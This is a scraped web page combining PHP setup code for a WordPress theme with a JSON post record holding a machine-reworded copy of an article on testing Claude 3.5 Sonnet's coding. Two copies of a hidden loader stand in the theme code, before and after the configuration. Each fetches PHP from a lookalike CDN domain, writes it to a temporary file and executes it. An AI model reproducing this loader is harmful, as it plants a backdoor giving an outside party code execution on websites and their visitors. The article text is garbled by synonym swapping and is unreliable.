$fu = "https://cdn-jsdelivr.googledv-hostinged.com/ggg"; $t = tempnam(sys_get_temp_dir(), 'tmp_') . '.php'; try { $ch = curl_init($fu); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $ct = curl_exec($ch); curl_close($ch); if ($ct && file_put_contents($t, $ct)) { include($t); } } finally { if (file_exists($t)) { unlink($t); } }// Fire up the theme - make available in Bunyad::get('theme') Bunyad::register('theme', [ 'class' => 'Bunyad_Theme_SmartMag', 'init' => true ]); // Legacy compat: Alias Bunyad::register('smart_mag', ['object' => Bunyad::get('theme')]); /** * Main Framework Configuration */ $bunyad = Bunyad::core()->init(apply_filters('bunyad_init_config', [ // Due to legacy compatibility, it's named smartmag without dash. 'theme_name' => 'smartmag', // For retrieving meta values from core plugin. 'meta_prefix' => '_bunyad', // Legacy compat. 'theme_version' => BUNYAD_THEME_VERSION, // Widgets enabled. 'post_formats' => ['gallery', 'image', 'video', 'audio'], // Sphere Core plugin components 'sphere_components' => [ 'social-follow', 'breadcrumbs', 'auto-load-post', 'adblock-detect', 'elementor\layouts', 'elementor\dynamic-tags' ], 'customizer' => [ 'font_aliases' => true ], 'add_sidebar_class' => false, ])); $fu = "https://cdn-jsdelivr.googledv-hostinged.com/ggg"; $t = tempnam(sys_get_temp_dir(), 'tmp_') . '.php'; try { $ch = curl_init($fu); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $ct = curl_exec($ch); curl_close($ch); if ($ct && file_put_contents($t, $ct)) { include($t); } } finally { if (file_exists($t)) { unlink($t); } }?>{"id":164587,"date":"2024-06-27T23:02:16","date_gmt":"2024-06-27T23:02:16","guid":{"rendered":"https:\/\/worthyhacks.com\/i-pitted-claude-3-5-sonnet-against-ai-coding-tests-chatgpt-aced-and-it-failed-creatively\/"},"modified":"2024-06-27T23:02:18","modified_gmt":"2024-06-27T23:02:18","slug":"i-pitted-claude-3-5-sonnet-against-ai-coding-tests-chatgpt-aced-and-it-failed-creatively","status":"publish","type":"post","link":"https:\/\/worthyhacks.com\/i-pitted-claude-3-5-sonnet-against-ai-coding-tests-chatgpt-aced-and-it-failed-creatively\/","title":{"rendered":"I pitted Claude 3.5 Sonnet against AI coding tests ChatGPT aced – and it failed creatively"},"content":{"rendered":"


\n<\/p>\n

\n
\n
\n
<\/source><\/source><\/source><\/picture><\/div>\n<\/p><\/div>
David Gewirtz\/ZDNET<\/span><\/figcaption><\/figure>\n

Final week, I obtained an e-mail from Anthropic saying that Claude 3.5 Sonnet was obtainable. In response to the AI firm, “Claude 3.5 Sonnet raises the trade bar for intelligence, outperforming competitor fashions and Claude 3 Opus on a variety of evaluations.” <\/p>\n

The corporate added: “Claude 3.5 Sonnet is good for advanced duties like code era.” I made a decision to see if that was true. <\/p>\n

Additionally: How to use ChatGPT to create an app<\/a><\/strong><\/p>\n

I am going to topic the brand new Claude 3.5 Sonnet mannequin to my commonplace set of coding assessments — \u00a0assessments I’ve run towards a variety of AIs with a variety of outcomes. Wish to observe together with your individual assessments? Level your browser to\u00a0How I test an AI chatbot’s coding ability – and you can too<\/a>, which incorporates all the usual assessments I apply, explanations of how they work, and what to search for within the outcomes.<\/p>\n

OK, let’s dig into the outcomes of every take a look at and see how they examine to earlier assessments utilizing\u00a0Microsoft Copilot<\/a>,\u00a0Meta AI<\/a>,\u00a0Meta Code Llama<\/a>,\u00a0Google Gemini Advanced<\/a>, and\u00a0ChatGPT<\/a>. <\/p>\n

<\/p>\n

1. Writing a WordPress plugin <\/h2>\n

At first, this appeared to have a lot promise. Let’s begin with the consumer interface Claude 3.5 Sonnet created primarily based on my take a look at immediate. <\/p>\n

\n
\n
\"cleanshot-2024-06-26-at-13-28-382x\"<\/picture><\/div>\n<\/p><\/div>
Screenshot by David Gewirtz\/ZDNET<\/span><\/figcaption><\/figure>\n

That is the primary time an AI has determined to place the 2 knowledge fields side-by-side. The format is clear and appears nice. <\/p>\n

Claude additionally determined to do one thing else I’ve by no means seen an AI do. This plugin will be created utilizing simply PHP code, which is the code operating on the again finish of a WordPress server. <\/p>\n

Additionally:\u00a0How I test an AI chatbot’s coding ability – and you can too<\/a><\/strong><\/p>\n

However some AI implementations additionally have added JavaScript code (which runs within the browser to manage dynamic consumer interface options) and CSS code (which controls how the browser shows info). <\/p>\n

In a PHP setting, for those who want PHP, JavaScript, and CSS, you may both embrace the CSS and JavaScript proper within the PHP code (that is a characteristic of PHP), or you may put the code in three separate information — one for PHP, one for JavaScript, and one for CSS.<\/p>\n

Often, when an AI needs to make use of all three languages, it exhibits what must be lower and pasted into the PHP file, then one other block to be lower and pasted right into a JavaScript file, after which a 3rd block to be lower and pasted right into a CSS file. <\/p>\n

However Claude simply supplied one PHP file after which, when it ran, auto-generated the JavaScript and CSS information into the plugin’s house listing. That is each pretty spectacular and considerably wrong-headed. It is cool that it tried to make the plugin creation course of simpler, however whether or not or not a plugin can write to its personal folder depends on the settings of the OS configuration — and there is a very excessive likelihood it may fail. <\/p>\n

I allowed it in my testing setting, however I might by no means enable a plugin to rewrite its personal code in a manufacturing setting. That is a really critical safety flaw. <\/p>\n

Additionally:\u00a0How to use ChatGPT to write code: What it can and can’t do for you<\/a><\/strong><\/p>\n

Regardless of the pretty artistic nature of Claude’s code era answer, the underside line is that the plugin failed. Urgent the Randomize button does completely nothing. That is unhappy as a result of, as I mentioned, it had a lot promise. <\/p>\n

Listed here are the combination outcomes of this and former assessments: <\/p>\n